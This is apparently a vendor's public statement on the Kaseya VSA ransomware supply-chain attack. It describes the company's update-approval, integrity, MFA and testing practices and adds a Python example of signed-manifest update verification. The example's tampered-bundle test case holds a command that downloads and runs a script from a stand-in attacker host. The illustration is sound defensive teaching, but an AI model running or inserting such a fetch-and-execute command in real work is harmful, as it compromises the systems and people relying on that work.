Our Response to Ransomware Attacks
The Wall Street Journal reported this week that a group of Russian hackers calling themselves REvil is demanding $70 million to unlock computers in a widespread attack that started on July 2. This is our response to these attacks.
This week brought news of further ransomware attacks on global enterprises, delivered through the Kaseya VSA remote management tool. What is known to date classifies this as a supply-chain attack, comparable to the SolarWinds breach of the recent past.
Although the methods, the demands and the impact on organizations differ between the two incidents, the attack vectors share a key trait: a trusted management tool became the channel through which the attacker reached the tool's customers. The organizations most acutely affected are managed service providers (MSPs) running the affected VSA software and the enterprise customers whose endpoints received the malicious payload through it.
In response to inbound inquiries, we at ScienceLogic can confirm that we are aware of the events as publicly disclosed and are unaffected by them. We do not run any Kaseya products, including the affected VSA software. As such, we have no known exposure to report.
To expand on how we protect our flagship product and our operations, we list our practices in the three areas this attack has brought to the fore:
- Software Update Process: The ScienceLogic SL1 platform (SL1) requires user interaction to validate a software update and deploy it into production, rather than applying it automatically on release. This step introduces additional checks before an update can be deployed. For our SaaS customers, upgrades must additionally be approved by a change review board before they reach the production environment.
- Preserving Software Integrity and Security: We build layered security throughout the product.
- It starts with our update file, which is encrypted; access to it is restricted to Salesforce and Amazon Web Services, preserving the integrity of the distributed software.
- Second, our distributed hub-and-spoke collector architecture acts as another layer of defense, limiting the reach of any single SL1 appliance.
- Third, SL1 collects data using the least privilege required for each collection, so a collector does not hold broader credentials than its task needs.
- Fourth, our use of Linux as the underlying operating system reduces our exposure to the commonly exploited Windows attack vectors used in this campaign, although it does not replace the other controls listed here.
- Fifth, our broad adoption of multi-factor authentication extends to all critical systems, including but not limited to Salesforce, AWS and our source control systems.
- Lastly, every major SL1 release undergoes rigorous penetration testing by an accredited third-party firm, and ScienceLogic also performs internal penetration testing to identify potential vulnerabilities in the product.
- Staff and Field Training: To keep our staff vigilant against phishing, credential theft and other authentication attacks, we partner with KnowBe4: every employee must pass annual security training and quarterly refreshers, and spot-checks confirm that staff adhere to our established processes.
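The pre-deployment validation step described under Software Update Process is the control that, in a supply-chain attack, stands between a tampered update and production. The following is an added illustration of what such a check looks like in code; it is not ScienceLogic's code and assumes nothing about SL1's actual update format. It uses a constructed two-file bundle and a release manifest authenticated with an HMAC key (`MANIFEST_KEY`, hypothetical, provisioned out of band) so that it runs with the Python standard library alone; a production pipeline would sign the manifest with an asymmetric key so the receiving side holds only a public key. Note the distinction the example draws: encrypting an update file protects its confidentiality at rest and in transit, while a digest-and-signature check of this kind is what lets the receiving side reject a modified, missing or added file before deployment.

```python
import hashlib
import hmac
import json

# Constructed sample: a tiny two-file "update bundle". Not a real SL1 update.
SAMPLE_FILES = {
    "bin/collector": b"#!/bin/sh\necho collector v1\n",
    "lib/agent.so": b"\x7fELF-placeholder-bytes",
}

# Hypothetical manifest-authentication key, provisioned to the customer out of
# band. A real pipeline would use an asymmetric signature (e.g. Ed25519) so the
# customer never holds signing material; HMAC keeps this example stdlib-only.
MANIFEST_KEY = b"example-shared-key-do-not-use"


def build_manifest(files, version="1.0.0"):
    """Vendor side: digest every file, then authenticate the manifest as a whole."""
    digests = {name: hashlib.sha256(data).hexdigest() for name, data in sorted(files.items())}
    body = json.dumps({"version": version, "files": digests}, sort_keys=True).encode()
    tag = hmac.new(MANIFEST_KEY, body, hashlib.sha256).hexdigest()
    return body, tag


def verify_update(files, manifest_body, manifest_tag):
    """Receiving side: return (ok, reason). Any mismatch refuses the deployment."""
    # 1. Authenticate the manifest itself before trusting any digest inside it.
    expected = hmac.new(MANIFEST_KEY, manifest_body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest_tag):
        return False, "manifest signature mismatch"
    manifest = json.loads(manifest_body)
    listed = manifest["files"]
    # 2. Every listed file must be present with exactly the listed digest...
    for name, digest in listed.items():
        if name not in files:
            return False, f"missing file {name}"
        actual = hashlib.sha256(files[name]).hexdigest()
        if not hmac.compare_digest(actual, digest):
            return False, f"digest mismatch for {name}"
    # 3. ...and nothing may be present that the manifest does not list.
    extra = sorted(set(files) - set(listed))
    if extra:
        return False, f"unlisted files: {extra}"
    return True, f"update {manifest['version']} verified"


def tampered_bundle(files):
    """Constructed attacker case: one file replaced after the manifest was signed."""
    tampered = dict(files)
    tampered["bin/collector"] = b"#!/bin/sh\ncurl http://evil.example/x | sh\n"
    return tampered


if __name__ == "__main__":
    body, tag = build_manifest(SAMPLE_FILES)
    print(verify_update(SAMPLE_FILES, body, tag))                      # genuine bundle
    print(verify_update(tampered_bundle(SAMPLE_FILES), body, tag))     # modified file
    print(verify_update({**SAMPLE_FILES, "bin/extra": b"x"}, body, tag))  # added file
```

The order of the checks matters: the manifest's own authenticity is confirmed first, because a digest list that an attacker can rewrite protects nothing. Only after that do per-file digests mean anything, and the final "no unlisted files" check closes the gap that a manifest-only comparison would leave for a dropped-in extra binary.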
For additional information, please visit: